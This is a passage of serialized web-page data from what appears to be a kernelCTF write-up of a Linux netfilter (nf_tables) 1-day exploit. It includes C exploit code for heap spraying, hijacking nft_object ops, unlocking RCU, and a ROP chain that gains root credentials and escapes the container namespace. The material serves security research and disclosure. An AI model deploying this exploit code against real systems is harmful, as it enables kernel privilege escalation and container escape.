fake_obj",{"type":24,"tag":301,"props":62599,"children":62600},{"style":359},[62601],{"type":30,"value":541},{"type":24,"tag":301,"props":62603,"children":62604},{"style":466},[62605],{"type":30,"value":62606},"9",{"type":24,"tag":301,"props":62608,"children":62609},{"style":359},[62610],{"type":30,"value":1046},{"type":24,"tag":301,"props":62612,"children":62613},{"style":385},[62614],{"type":30,"value":523},{"type":24,"tag":301,"props":62616,"children":62617},{"style":369},[62618],{"type":30,"value":62619}," fake_obj",{"type":24,"tag":301,"props":62621,"children":62622},{"style":359},[62623],{"type":30,"value":541},{"type":24,"tag":301,"props":62625,"children":62626},{"style":466},[62627],{"type":30,"value":584},{"type":24,"tag":301,"props":62629,"children":62630},{"style":359},[62631],{"type":30,"value":1508},{"type":24,"tag":301,"props":62633,"children":62634},{"style":1062},[62635],{"type":30,"value":62636}," // udata = list->next\n",{"type":24,"tag":301,"props":62638,"children":62639},{"class":303,"line":401},[62640,62644,62648,62652,62656,62660],{"type":24,"tag":301,"props":62641,"children":62642},{"style":314},[62643],{"type":30,"value":62250},{"type":24,"tag":301,"props":62645,"children":62646},{"style":359},[62647],{"type":30,"value":62255},{"type":24,"tag":301,"props":62649,"children":62650},{"style":466},[62651],{"type":30,"value":1503},{"type":24,"tag":301,"props":62653,"children":62654},{"style":359},[62655],{"type":30,"value":377},{"type":24,"tag":301,"props":62657,"children":62658},{"style":466},[62659],{"type":30,"value":546},{"type":24,"tag":301,"props":62661,"children":62662},{"style":359},[62663],{"type":30,"value":589},{"type":24,"tag":301,"props":62665,"children":62666},{"class":303,"line":415},[62667,62671],{"type":24,"tag":301,"props":62668,"children":62669},{"style":314},[62670],{"type":30,"value":62279},{"type":24,"tag":301,"props":62672,"children":62673},{"style":359},[62674],{"type":30,"value":4859},{"type":24,"tag":301,"props":62676,"children":62677},{"class":303,"line":439},[62678,62683,62687,62692,62696,62700,62704,62708],{"type":24,"tag":301,"props":62679,"children":62680},{"style":314},[62681],{"type":30,"value":62682}," udata_spray",{"type":24,"tag":301,"props":62684,"children":62685},{"style":359},[62686],{"type":30,"value":62255},{"type":24,"tag":301,"props":62688,"children":62689},{"style":466},[62690],{"type":30,"value":62691},"0xe8",{"type":24,"tag":301,"props":62693,"children":62694},{"style":359},[62695],{"type":30,"value":377},{"type":24,"tag":301,"props":62697,"children":62698},{"style":466},[62699],{"type":30,"value":1447},{"type":24,"tag":301,"props":62701,"children":62702},{"style":359},[62703],{"type":30,"value":377},{"type":24,"tag":301,"props":62705,"children":62706},{"style":466},[62707],{"type":30,"value":546},{"type":24,"tag":301,"props":62709,"children":62710},{"style":359},[62711],{"type":30,"value":62712},", fake_obj);\n",{"type":24,"tag":301,"props":62714,"children":62715},{"class":303,"line":447},[62716],{"type":24,"tag":301,"props":62717,"children":62718},{"emptyLinePlaceholder":16},[62719],{"type":30,"value":341},{"type":24,"tag":301,"props":62721,"children":62722},{"class":303,"line":476},[62723,62728,62732,62737,62741,62745],{"type":24,"tag":301,"props":62724,"children":62725},{"style":314},[62726],{"type":30,"value":62727}," get_obj",{"type":24,"tag":301,"props":62729,"children":62730},{"style":359},[62731],{"type":30,"value":62255},{"type":24,"tag":301,"props":62733,"children":62734},{"style":329},[62735],{"type":30,"value":62736},"\"spray-0\"",{"type":24,"tag":301,"props":62738,"children":62739},{"style":359},[62740],{"type":30,"value":377},{"type":24,"tag":301,"props":62742,"children":62743},{"style":348},[62744],{"type":30,"value":10819},{"type":24,"tag":301,"props":62746,"children":62747},{"style":359},[62748],{"type":30,"value":589},{"type":24,"tag":301,"props":62750,"children":62751},{"class":303,"line":495},[62752,62757,62761,62766,62770,62774],{"type":24,"tag":301,"props":62753,"children":62754},{"style":314},[62755],{"type":30,"value":62756}," printf",{"type":24,"tag":301,"props":62758,"children":62759},{"style":359},[62760],{"type":30,"value":362},{"type":24,"tag":301,"props":62762,"children":62763},{"style":329},[62764],{"type":30,"value":62765},"\"[*] nft_object ptr: 0x%lx",{"type":24,"tag":301,"props":62767,"children":62768},{"style":9400},[62769],{"type":30,"value":55111},{"type":24,"tag":301,"props":62771,"children":62772},{"style":329},[62773],{"type":30,"value":9408},{"type":24,"tag":301,"props":62775,"children":62776},{"style":359},[62777],{"type":30,"value":62778},", obj_ptr);\n",{"type":24,"tag":301,"props":62780,"children":62781},{"class":303,"line":504},[62782],{"type":24,"tag":301,"props":62783,"children":62784},{"style":359},[62785],{"type":30,"value":17123},{"type":24,"tag":80,"props":62787,"children":62789},{"id":62788},"hijacking-control-flow",[62790],{"type":30,"value":62791},"Hijacking control-flow",{"type":24,"tag":32,"props":62793,"children":62794},{},[62795,62797,62802,62804,62809,62811,62816,62818,62823,62825,62830,62832],{"type":30,"value":62796},"To hijack control-flow, we can use ",{"type":24,"tag":145,"props":62798,"children":62800},{"className":62799},[],[62801],{"type":30,"value":61836},{"type":30,"value":62803}," once again. The ",{"type":24,"tag":145,"props":62805,"children":62807},{"className":62806},[],[62808],{"type":30,"value":61836},{"type":30,"value":62810}," struct has an ",{"type":24,"tag":145,"props":62812,"children":62814},{"className":62813},[],[62815],{"type":30,"value":59394},{"type":30,"value":62817}," pointer to a function pointer table. We can swap the ",{"type":24,"tag":145,"props":62819,"children":62821},{"className":62820},[],[62822],{"type":30,"value":59394},{"type":30,"value":62824}," pointer with the ",{"type":24,"tag":145,"props":62826,"children":62828},{"className":62827},[],[62829],{"type":30,"value":61821},{"type":30,"value":62831}," pointer, taking control of the pointer table.\n",{"type":24,"tag":177,"props":62833,"children":62835},{"alt":179,"src":62834},"/posts/netfilter-universal-root-1-day/control-flow.png",[],{"type":24,"tag":291,"props":62837,"children":62839},{"className":35866,"code":62838,"language":35868,"meta":7,"style":7},"[...]\n // Fake ops\n uint64_t *rop = calloc(29, sizeof(uint64_t));\n rop[0] = kaslr_slide + 0xffffffff81988647; // push rsi; jmp qword ptr [rsi + 0x39];\n rop[2] = kaslr_slide + NFT_CT_EXPECT_OBJ_TYPE;\n[...]\n // Send ROP in object udata\n del_obj(nl, \"spray-0\");\n wait_destroyer();\n obj_spray(nl, 1, 1, rop, 0xb8);\n fake_obj = (uint64_t *)getudata(nl, \"spray-3\");\n DumpHex(fake_obj, 0xe8);\n uint64_t rop_addr = fake_obj[9]; // udata ptr\n printf(\"[*] ROP addr: 0x%lx\\n\", rop_addr);\n\n // Point to fake ops\n fake_obj[16] = rop_addr - 0x20; // Point ops to fake ptr table\n[...]\n // Write ROP\n puts(\"[*] Write ROP\");\n deludata_spray(nl, 3, 1);\n wait_destroyer();\n udata_spray(nl, 0xe8, 4, 1, fake_obj);\n\n // Takeover RIP\n puts(\"[*] Takeover RIP\");\n dump_obj(nl, \"spray-1\");\n[...]\n",[62840],{"type":24,"tag":145,"props":62841,"children":62842},{"__ignoreMap":7},[62843,62850,62858,62882,62929,62965,62972,62980,63012,63020,63028,63049,63057,63065,63129,63136,63144,63152,63159,63167,63201,63209,63216,63224,63231,63239,63272,63293],{"type":24,"tag":301,"props":62844,"children":62845},{"class":303,"line":304},[62846],{"type":24,"tag":301,"props":62847,"children":62848},{"style":359},[62849],{"type":30,"value":17123},{"type":24,"tag":301,"props":62851,"children":62852},{"class":303,"line":320},[62853],{"type":24,"tag":301,"props":62854,"children":62855},{"style":359},[62856],{"type":30,"value":62857}," // Fake ops\n",{"type":24,"tag":301,"props":62859,"children":62860},{"class":303,"line":335},[62861,62866,62870,62874,62878],{"type":24,"tag":301,"props":62862,"children":62863},{"style":359},[62864],{"type":30,"value":62865}," uint64_t *rop = calloc(29, ",{"type":24,"tag":301,"props":62867,"children":62868},{"style":10246},[62869],{"type":30,"value":62050},{"type":24,"tag":301,"props":62871,"children":62872},{"style":359},[62873],{"type":30,"value":362},{"type":24,"tag":301,"props":62875,"children":62876},{"style":348},[62877],{"type":30,"value":6020},{"type":24,"tag":301,"props":62879,"children":62880},{"style":359},[62881],{"type":30,"value":3416},{"type":24,"tag":301,"props":62883,"children":62884},{"class":303,"line":344},[62885,62890,62894,62898,62902,62906,62911,62915,62920,62924],{"type":24,"tag":301,"props":62886,"children":62887},{"style":369},[62888],{"type":30,"value":62889}," rop",{"type":24,"tag":301,"props":62891,"children":62892},{"style":359},[62893],{"type":30,"value":541},{"type":24,"tag":301,"props":62895,"children":62896},{"style":466},[62897],{"type":30,"value":584},{"type":24,"tag":301,"props":62899,"children":62900},{"style":359},[62901],{"type":30,"value":1046},{"type":24,"tag":301,"props":62903,"children":62904},{"style":385},[62905],{"type":30,"value":523},{"type":24,"tag":301,"props":62907,"children":62908},{"style":359},[62909],{"type":30,"value":62910}," kaslr_slide ",{"type":24,"tag":301,"props":62912,"children":62913},{"style":385},[62914],{"type":30,"value":11206},{"type":24,"tag":301,"props":62916,"children":62917},{"style":466},[62918],{"type":30,"value":62919}," 0xffffffff81988647",{"type":24,"tag":301,"props":62921,"children":62922},{"style":359},[62923],{"type":30,"value":1059},{"type":24,"tag":301,"props":62925,"children":62926},{"style":1062},[62927],{"type":30,"value":62928}," // push rsi; jmp qword ptr [rsi + 0x39];\n",{"type":24,"tag":301,"props":62930,"children":62931},{"class":303,"line":401},[62932,62936,62940,62944,62948,62952,62956,62960],{"type":24,"tag":301,"props":62933,"children":62934},{"style":369},[62935],{"type":30,"value":62889},{"type":24,"tag":301,"props":62937,"children":62938},{"style":359},[62939],{"type":30,"value":541},{"type":24,"tag":301,"props":62941,"children":62942},{"style":466},[62943],{"type":30,"value":1503},{"type":24,"tag":301,"props":62945,"children":62946},{"style":359},[62947],{"type":30,"value":1046},{"type":24,"tag":301,"props":62949,"children":62950},{"style":385},[62951],{"type":30,"value":523},{"type":24,"tag":301,"props":62953,"children":62954},{"style":359},[62955],{"type":30,"value":62910},{"type":24,"tag":301,"props":62957,"children":62958},{"style":385},[62959],{"type":30,"value":11206},{"type":24,"tag":301,"props":62961,"children":62962},{"style":359},[62963],{"type":30,"value":62964}," NFT_CT_EXPECT_OBJ_TYPE;\n",{"type":24,"tag":301,"props":62966,"children":62967},{"class":303,"line":415},[62968],{"type":24,"tag":301,"props":62969,"children":62970},{"style":359},[62971],{"type":30,"value":17123},{"type":24,"tag":301,"props":62973,"children":62974},{"class":303,"line":439},[62975],{"type":24,"tag":301,"props":62976,"children":62977},{"style":359},[62978],{"type":30,"value":62979}," // Send ROP in object udata\n",{"type":24,"tag":301,"props":62981,"children":62982},{"class":303,"line":447},[62983,62988,62992,62997,63002,63007],{"type":24,"tag":301,"props":62984,"children":62985},{"style":359},[62986],{"type":30,"value":62987}," del_obj(",{"type":24,"tag":301,"props":62989,"children":62990},{"style":10246},[62991],{"type":30,"value":61014},{"type":24,"tag":301,"props":62993,"children":62994},{"style":359},[62995],{"type":30,"value":62996},", \"",{"type":24,"tag":301,"props":62998,"children":62999},{"style":10246},[63000],{"type":30,"value":63001},"spray",{"type":24,"tag":301,"props":63003,"children":63004},{"style":359},[63005],{"type":30,"value":63006},"-0",{"type":24,"tag":301,"props":63008,"children":63009},{"style":329},[63010],{"type":30,"value":63011},"\");\n",{"type":24,"tag":301,"props":63013,"children":63014},{"class":303,"line":476},[63015],{"type":24,"tag":301,"props":63016,"children":63017},{"style":329},[63018],{"type":30,"value":63019}," wait_destroyer();\n",{"type":24,"tag":301,"props":63021,"children":63022},{"class":303,"line":495},[63023],{"type":24,"tag":301,"props":63024,"children":63025},{"style":329},[63026],{"type":30,"value":63027}," obj_spray(nl, 1, 1, rop, 0xb8);\n",{"type":24,"tag":301,"props":63029,"children":63030},{"class":303,"line":504},[63031,63036,63040,63045],{"type":24,"tag":301,"props":63032,"children":63033},{"style":329},[63034],{"type":30,"value":63035}," fake_obj = (uint64_t *)getudata(nl, \"",{"type":24,"tag":301,"props":63037,"children":63038},{"style":348},[63039],{"type":30,"value":63001},{"type":24,"tag":301,"props":63041,"children":63042},{"style":359},[63043],{"type":30,"value":63044},"-3",{"type":24,"tag":301,"props":63046,"children":63047},{"style":329},[63048],{"type":30,"value":63011},{"type":24,"tag":301,"props":63050,"children":63051},{"class":303,"line":512},[63052],{"type":24,"tag":301,"props":63053,"children":63054},{"style":329},[63055],{"type":30,"value":63056}," DumpHex(fake_obj, 0xe8);\n",{"type":24,"tag":301,"props":63058,"children":63059},{"class":303,"line":592},[63060],{"type":24,"tag":301,"props":63061,"children":63062},{"style":329},[63063],{"type":30,"value":63064}," uint64_t rop_addr = fake_obj[9]; // udata ptr\n",{"type":24,"tag":301,"props":63066,"children":63067},{"class":303,"line":619},[63068,63073,63077,63081,63085,63090,63095,63100,63104,63109,63114,63119,63124],{"type":24,"tag":301,"props":63069,"children":63070},{"style":329},[63071],{"type":30,"value":63072}," printf(\"",{"type":24,"tag":301,"props":63074,"children":63075},{"style":359},[63076],{"type":30,"value":541},{"type":24,"tag":301,"props":63078,"children":63079},{"style":385},[63080],{"type":30,"value":772},{"type":24,"tag":301,"props":63082,"children":63083},{"style":359},[63084],{"type":30,"value":1046},{"type":24,"tag":301,"props":63086,"children":63087},{"style":10246},[63088],{"type":30,"value":63089},"ROP",{"type":24,"tag":301,"props":63091,"children":63092},{"style":10246},[63093],{"type":30,"value":63094}," addr",{"type":24,"tag":301,"props":63096,"children":63097},{"style":359},[63098],{"type":30,"value":63099},": 0",{"type":24,"tag":301,"props":63101,"children":63102},{"style":10246},[63103],{"type":30,"value":26050},{"type":24,"tag":301,"props":63105,"children":63106},{"style":359},[63107],{"type":30,"value":63108},"%",{"type":24,"tag":301,"props":63110,"children":63111},{"style":10246},[63112],{"type":30,"value":63113},"lx",{"type":24,"tag":301,"props":63115,"children":63116},{"style":359},[63117],{"type":30,"value":63118},"\\",{"type":24,"tag":301,"props":63120,"children":63121},{"style":10246},[63122],{"type":30,"value":63123},"n",{"type":24,"tag":301,"props":63125,"children":63126},{"style":329},[63127],{"type":30,"value":63128},"\", rop_addr);\n",{"type":24,"tag":301,"props":63130,"children":63131},{"class":303,"line":635},[63132],{"type":24,"tag":301,"props":63133,"children":63134},{"emptyLinePlaceholder":16},[63135],{"type":30,"value":341},{"type":24,"tag":301,"props":63137,"children":63138},{"class":303,"line":643},[63139],{"type":24,"tag":301,"props":63140,"children":63141},{"style":329},[63142],{"type":30,"value":63143}," // Point to fake ops\n",{"type":24,"tag":301,"props":63145,"children":63146},{"class":303,"line":652},[63147],{"type":24,"tag":301,"props":63148,"children":63149},{"style":329},[63150],{"type":30,"value":63151}," fake_obj[16] = rop_addr - 0x20; // Point ops to fake ptr table\n",{"type":24,"tag":301,"props":63153,"children":63154},{"class":303,"line":666},[63155],{"type":24,"tag":301,"props":63156,"children":63157},{"style":329},[63158],{"type":30,"value":17123},{"type":24,"tag":301,"props":63160,"children":63161},{"class":303,"line":674},[63162],{"type":24,"tag":301,"props":63163,"children":63164},{"style":329},[63165],{"type":30,"value":63166}," // Write ROP\n",{"type":24,"tag":301,"props":63168,"children":63169},{"class":303,"line":692},[63170,63175,63179,63183,63187,63192,63197],{"type":24,"tag":301,"props":63171,"children":63172},{"style":329},[63173],{"type":30,"value":63174}," puts(\"",{"type":24,"tag":301,"props":63176,"children":63177},{"style":359},[63178],{"type":30,"value":541},{"type":24,"tag":301,"props":63180,"children":63181},{"style":385},[63182],{"type":30,"value":772},{"type":24,"tag":301,"props":63184,"children":63185},{"style":359},[63186],{"type":30,"value":1046},{"type":24,"tag":301,"props":63188,"children":63189},{"style":10246},[63190],{"type":30,"value":63191},"Write",{"type":24,"tag":301,"props":63193,"children":63194},{"style":10246},[63195],{"type":30,"value":63196}," ROP",{"type":24,"tag":301,"props":63198,"children":63199},{"style":329},[63200],{"type":30,"value":63011},{"type":24,"tag":301,"props":63202,"children":63203},{"class":303,"line":3631},[63204],{"type":24,"tag":301,"props":63205,"children":63206},{"style":329},[63207],{"type":30,"value":63208}," deludata_spray(nl, 3, 1);\n",{"type":24,"tag":301,"props":63210,"children":63211},{"class":303,"line":3639},[63212],{"type":24,"tag":301,"props":63213,"children":63214},{"style":329},[63215],{"type":30,"value":63019},{"type":24,"tag":301,"props":63217,"children":63218},{"class":303,"line":3647},[63219],{"type":24,"tag":301,"props":63220,"children":63221},{"style":329},[63222],{"type":30,"value":63223}," udata_spray(nl, 0xe8, 4, 1, fake_obj);\n",{"type":24,"tag":301,"props":63225,"children":63226},{"class":303,"line":3685},[63227],{"type":24,"tag":301,"props":63228,"children":63229},{"emptyLinePlaceholder":16},[63230],{"type":30,"value":341},{"type":24,"tag":301,"props":63232,"children":63233},{"class":303,"line":3713},[63234],{"type":24,"tag":301,"props":63235,"children":63236},{"style":329},[63237],{"type":30,"value":63238}," // Takeover RIP\n",{"type":24,"tag":301,"props":63240,"children":63241},{"class":303,"line":3721},[63242,63246,63250,63254,63258,63263,63268],{"type":24,"tag":301,"props":63243,"children":63244},{"style":329},[63245],{"type":30,"value":63174},{"type":24,"tag":301,"props":63247,"children":63248},{"style":359},[63249],{"type":30,"value":541},{"type":24,"tag":301,"props":63251,"children":63252},{"style":385},[63253],{"type":30,"value":772},{"type":24,"tag":301,"props":63255,"children":63256},{"style":359},[63257],{"type":30,"value":1046},{"type":24,"tag":301,"props":63259,"children":63260},{"style":10246},[63261],{"type":30,"value":63262},"Takeover",{"type":24,"tag":301,"props":63264,"children":63265},{"style":10246},[63266],{"type":30,"value":63267}," RIP",{"type":24,"tag":301,"props":63269,"children":63270},{"style":329},[63271],{"type":30,"value":63011},{"type":24,"tag":301,"props":63273,"children":63274},{"class":303,"line":3751},[63275,63280,63284,63289],{"type":24,"tag":301,"props":63276,"children":63277},{"style":329},[63278],{"type":30,"value":63279}," dump_obj(nl, \"",{"type":24,"tag":301,"props":63281,"children":63282},{"style":348},[63283],{"type":30,"value":63001},{"type":24,"tag":301,"props":63285,"children":63286},{"style":359},[63287],{"type":30,"value":63288},"-1",{"type":24,"tag":301,"props":63290,"children":63291},{"style":329},[63292],{"type":30,"value":63011},{"type":24,"tag":301,"props":63294,"children":63295},{"class":303,"line":3782},[63296],{"type":24,"tag":301,"props":63297,"children":63298},{"style":329},[63299],{"type":30,"value":17123},{"type":24,"tag":80,"props":63301,"children":63303},{"id":63302},"bypass-context-switch-in-rcu-critical-section",[63304],{"type":30,"value":63305},"Bypass context switch in RCU critical-section",{"type":24,"tag":32,"props":63307,"children":63308},{},[63309,63310,63315],{"type":30,"value":8079},{"type":24,"tag":145,"props":63311,"children":63313},{"className":63312},[],[63314],{"type":30,"value":61836},{"type":30,"value":63316}," operations are invoked from an RCU critical-section, which can be a problem for ROPing since we want to switch contexts to userland after executing our payload, which is illegal in RCU critical-sections.",{"type":24,"tag":32,"props":63318,"children":63319},{},[63320,63322,63329,63331,63337,63339,63345],{"type":30,"value":63321},"A workaround has been discussed before by D3v17 in a ",{"type":24,"tag":188,"props":63323,"children":63326},{"href":63324,"rel":63325},"https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-0461_mitigation/docs/exploit.md#post-rip",[192],[63327],{"type":30,"value":63328},"previous kernelCTF submission",{"type":30,"value":63330}," that basically consists in using memory write gadgets to overwrite the RCU lock in our ",{"type":24,"tag":145,"props":63332,"children":63334},{"className":63333},[],[63335],{"type":30,"value":63336},"task_struct",{"type":30,"value":63338}," before switching to userland. Although this works, I struggled to find useful gadgets but ended up coming up with an easier solution. There are kernel APIs specifically meant for acquiring/releasing the RCU lock, so we should be able to simply call ",{"type":24,"tag":145,"props":63340,"children":63342},{"className":63341},[],[63343],{"type":30,"value":63344},"__rcu_read_unlock()",{"type":30,"value":63346}," function and exit the RCU critical-section before switching contexts.",{"type":24,"tag":291,"props":63348,"children":63350},{"className":35866,"code":63349,"language":35868,"meta":7,"style":7}," // ROP stage 1\n int pos = 3;\n\n rop[pos++] = kaslr_slide + __RCU_READ_UNLOCK;\n",[63351],{"type":24,"tag":145,"props":63352,"children":63353},{"__ignoreMap":7},[63354,63362,63386,63393],{"type":24,"tag":301,"props":63355,"children":63356},{"class":303,"line":304},[63357],{"type":24,"tag":301,"props":63358,"children":63359},{"style":1062},[63360],{"type":30,"value":63361}," // ROP stage 1\n",{"type":24,"tag":301,"props":63363,"children":63364},{"class":303,"line":320},[63365,63369,63374,63378,63382],{"type":24,"tag":301,"props":63366,"children":63367},{"style":348},[63368],{"type":30,"value":407},{"type":24,"tag":301,"props":63370,"children":63371},{"style":359},[63372],{"type":30,"value":63373}," pos ",{"type":24,"tag":301,"props":63375,"children":63376},{"style":385},[63377],{"type":30,"value":523},{"type":24,"tag":301,"props":63379,"children":63380},{"style":466},[63381],{"type":30,"value":25873},{"type":24,"tag":301,"props":63383,"children":63384},{"style":359},[63385],{"type":30,"value":492},{"type":24,"tag":301,"props":63387,"children":63388},{"class":303,"line":335},[63389],{"type":24,"tag":301,"props":63390,"children":63391},{"emptyLinePlaceholder":16},[63392],{"type":30,"value":341},{"type":24,"tag":301,"props":63394,"children":63395},{"class":303,"line":344},[63396,63400,63405,63409,63413,63417,63421,63425],{"type":24,"tag":301,"props":63397,"children":63398},{"style":369},[63399],{"type":30,"value":62889},{"type":24,"tag":301,"props":63401,"children":63402},{"style":359},[63403],{"type":30,"value":63404},"[pos",{"type":24,"tag":301,"props":63406,"children":63407},{"style":385},[63408],{"type":30,"value":1859},{"type":24,"tag":301,"props":63410,"children":63411},{"style":359},[63412],{"type":30,"value":1046},{"type":24,"tag":301,"props":63414,"children":63415},{"style":385},[63416],{"type":30,"value":523},{"type":24,"tag":301,"props":63418,"children":63419},{"style":359},[63420],{"type":30,"value":62910},{"type":24,"tag":301,"props":63422,"children":63423},{"style":385},[63424],{"type":30,"value":11206},{"type":24,"tag":301,"props":63426,"children":63427},{"style":359},[63428],{"type":30,"value":63429}," __RCU_READ_UNLOCK;\n",{"type":24,"tag":80,"props":63431,"children":63433},{"id":63432},"rop",[63434],{"type":30,"value":63089},{"type":24,"tag":32,"props":63436,"children":63437},{},[63438],{"type":30,"value":63439},"Most of the ROP chain to escape the container as root is business as usual:",{"type":24,"tag":2655,"props":63441,"children":63442},{},[63443,63454,63465],{"type":24,"tag":2659,"props":63444,"children":63445},{},[63446,63452],{"type":24,"tag":145,"props":63447,"children":63449},{"className":63448},[],[63450],{"type":30,"value":63451},"commit_creds(&init_cred);",{"type":30,"value":63453}," Commit root credentials to our process",{"type":24,"tag":2659,"props":63455,"children":63456},{},[63457,63463],{"type":24,"tag":145,"props":63458,"children":63460},{"className":63459},[],[63461],{"type":30,"value":63462},"task = find_task_by_vpid(1);",{"type":30,"value":63464}," Find the root process of our namespace",{"type":24,"tag":2659,"props":63466,"children":63467},{},[63468,63474],{"type":24,"tag":145,"props":63469,"children":63471},{"className":63470},[],[63472],{"type":30,"value":63473},"switch_task_namespaces(task, &init_nsproxy);",{"type":30,"value":63475}," Move it to the root namespace",{"type":24,"tag":32,"props":63477,"children":63478},{},[63479,63481,63487,63489,63494,63495,63501,63503,63509,63511,63516,63518,63524],{"type":30,"value":63480},"However, I had a hard time finding gadgets to easily move the return value of ",{"type":24,"tag":145,"props":63482,"children":63484},{"className":63483},[],[63485],{"type":30,"value":63486},"find_task_by_vpid(1)",{"type":30,"value":63488}," passed through ",{"type":24,"tag":145,"props":63490,"children":63492},{"className":63491},[],[63493],{"type":30,"value":5063},{"type":30,"value":6000},{"type":24,"tag":145,"props":63496,"children":63498},{"className":63497},[],[63499],{"type":30,"value":63500},"rdi",{"type":30,"value":63502},". What I ended up going with was a ",{"type":24,"tag":145,"props":63504,"children":63506},{"className":63505},[],[63507],{"type":30,"value":63508},"push rax; jmp qword ptr [rsi + 0x66]; ret",{"type":30,"value":63510}," gadget, that allowed me to push the ",{"type":24,"tag":145,"props":63512,"children":63514},{"className":63513},[],[63515],{"type":30,"value":5063},{"type":30,"value":63517}," value onto the stack and then jump to a controlled location, where I stored a ",{"type":24,"tag":145,"props":63519,"children":63521},{"className":63520},[],[63522],{"type":30,"value":63523},"pop rdi; ret",{"type":30,"value":63525}," gadget to consume the new stack value and restore normal ROP execution. This very minor detour in the ROP flow looks like this:",{"type":24,"tag":2655,"props":63527,"children":63528},{},[63529,63534,63547],{"type":24,"tag":2659,"props":63530,"children":63531},{},[63532],{"type":30,"value":63533},"We push the value onto the stack (stack pointer regresses)",{"type":24,"tag":2659,"props":63535,"children":63536},{},[63537,63539,63545],{"type":30,"value":63538},"We jump to our \"trampoline\" gadget (",{"type":24,"tag":145,"props":63540,"children":63542},{"className":63541},[],[63543],{"type":30,"value":63544},"pop rdi; ret;",{"type":30,"value":63546}," location)",{"type":24,"tag":2659,"props":63548,"children":63549},{},[63550,63555],{"type":24,"tag":145,"props":63551,"children":63553},{"className":63552},[],[63554],{"type":30,"value":63523},{"type":30,"value":63556}," consumes the value from the stack (progressing the stack pointer back to where it should be), and then we bounce back to the next gadget",{"type":24,"tag":291,"props":63558,"children":63560},{"className":35866,"code":63559,"language":35868,"meta":7,"style":7},"[...]\n // commit_creds(&init_cred);\n rop[pos++] = kaslr_slide + 0xffffffff8112c7c0; // pop rdi; ret;\n rop[pos++] = kaslr_slide + INIT_CRED;\n rop[pos++] = kaslr_slide + COMMIT_CREDS;\n\n // task = find_task_by_vpid(1);\n rop[pos++] = kaslr_slide + 0xffffffff8112c7c0; // pop rdi; ret;\n rop[pos++] = 1;\n rop[pos++] = kaslr_slide + FIND_TASK_BY_VPID;\n rop[pos++] = kaslr_slide + 0xffffffff8102e2a6; // pop rsi; ret;\n rop[pos++] = obj_ptr + 0xe0 - 0x66; // rax -> rdi and resume rop\n rop[pos++] = kaslr_slide + 0xffffffff81caed31; // push rax; jmp qword ptr [rsi + 0x66];\n\n // switch_task_namespaces(task, &init_nsproxy);\n rop[pos++] = kaslr_slide + 0xffffffff8102e2a6; // pop rsi; ret;\n rop[pos++] = kaslr_slide + INIT_NSPROXY;\n rop[pos++] = kaslr_slide + SWITCH_TASK_NAMESPACES;\n[...]\n",[63561],{"type":24,"tag":145,"props":63562,"children":63563},{"__ignoreMap":7},[63564,63571,63588,63633,63669,63705,63712,63720,63763,63794,63830,63875,63930,63975,63982,63990,64033,64069,64105],{"type":24,"tag":301,"props":63565,"children":63566},{"class":303,"line":304},[63567],{"type":24,"tag":301,"props":63568,"children":63569},{"style":359},[63570],{"type":30,"value":17123},{"type":24,"tag":301,"props":63572,"children":63573},{"class":303,"line":320},[63574,63579,63584],{"type":24,"tag":301,"props":63575,"children":63576},{"style":359},[63577],{"type":30,"value":63578}," // commit_creds(&",{"type":24,"tag":301,"props":63580,"children":63581},{"style":369},[63582],{"type":30,"value":63583},"init_cred",{"type":24,"tag":301,"props":63585,"children":63586},{"style":359},[63587],{"type":30,"value":589},{"type":24,"tag":301,"props":63589,"children":63590},{"class":303,"line":335},[63591,63595,63599,63603,63607,63611,63615,63619,63624,63628],{"type":24,"tag":301,"props":63592,"children":63593},{"style":369},[63594],{"type":30,"value":62889},{"type":24,"tag":301,"props":63596,"children":63597},{"style":359},[63598],{"type":30,"value":63404},{"type":24,"tag":301,"props":63600,"children":63601},{"style":385},[63602],{"type":30,"value":1859},{"type":24,"tag":301,"props":63604,"children":63605},{"style":359},[63606],{"type":30,"value":1046},{"type":24,"tag":301,"props":63608,"children":63609},{"style":385},[63610],{"type":30,"value":523},{"type":24,"tag":301,"props":63612,"children":63613},{"style":359},[63614],{"type":30,"value":62910},{"type":24,"tag":301,"props":63616,"children":63617},{"style":385},[63618],{"type":30,"value":11206},{"type":24,"tag":301,"props":63620,"children":63621},{"style":466},[63622],{"type":30,"value":63623}," 0xffffffff8112c7c0",{"type":24,"tag":301,"props":63625,"children":63626},{"style":359},[63627],{"type":30,"value":1059},{"type":24,"tag":301,"props":63629,"children":63630},{"style":1062},[63631],{"type":30,"value":63632}," // pop rdi; ret;\n",{"type":24,"tag":301,"props":63634,"children":63635},{"class":303,"line":344},[63636,63640,63644,63648,63652,63656,63660,63664],{"type":24,"tag":301,"props":63637,"children":63638},{"style":369},[63639],{"type":30,"value":62889},{"type":24,"tag":301,"props":63641,"children":63642},{"style":359},[63643],{"type":30,"value":63404},{"type":24,"tag":301,"props":63645,"children":63646},{"style":385},[63647],{"type":30,"value":1859},{"type":24,"tag":301,"props":63649,"children":63650},{"style":359},[63651],{"type":30,"value":1046},{"type":24,"tag":301,"props":63653,"children":63654},{"style":385},[63655],{"type":30,"value":523},{"type":24,"tag":301,"props":63657,"children":63658},{"style":359},[63659],{"type":30,"value":62910},{"type":24,"tag":301,"props":63661,"children":63662},{"style":385},[63663],{"type":30,"value":11206},{"type":24,"tag":301,"props":63665,"children":63666},{"style":359},[63667],{"type":30,"value":63668}," INIT_CRED;\n",{"type":24,"tag":301,"props":63670,"children":63671},{"class":303,"line":401},[63672,63676,63680,63684,63688,63692,63696,63700],{"type":24,"tag":301,"props":63673,"children":63674},{"style":369},[63675],{"type":30,"value":62889},{"type":24,"tag":301,"props":63677,"children":63678},{"style":359},[63679],{"type":30,"value":63404},{"type":24,"tag":301,"props":63681,"children":63682},{"style":385},[63683],{"type":30,"value":1859},{"type":24,"tag":301,"props":63685,"children":63686},{"style":359},[63687],{"type":30,"value":1046},{"type":24,"tag":301,"props":63689,"children":63690},{"style":385},[63691],{"type":30,"value":523},{"type":24,"tag":301,"props":63693,"children":63694},{"style":359},[63695],{"type":30,"value":62910},{"type":24,"tag":301,"props":63697,"children":63698},{"style":385},[63699],{"type":30,"value":11206},{"type":24,"tag":301,"props":63701,"children":63702},{"style":359},[63703],{"type":30,"value":63704}," 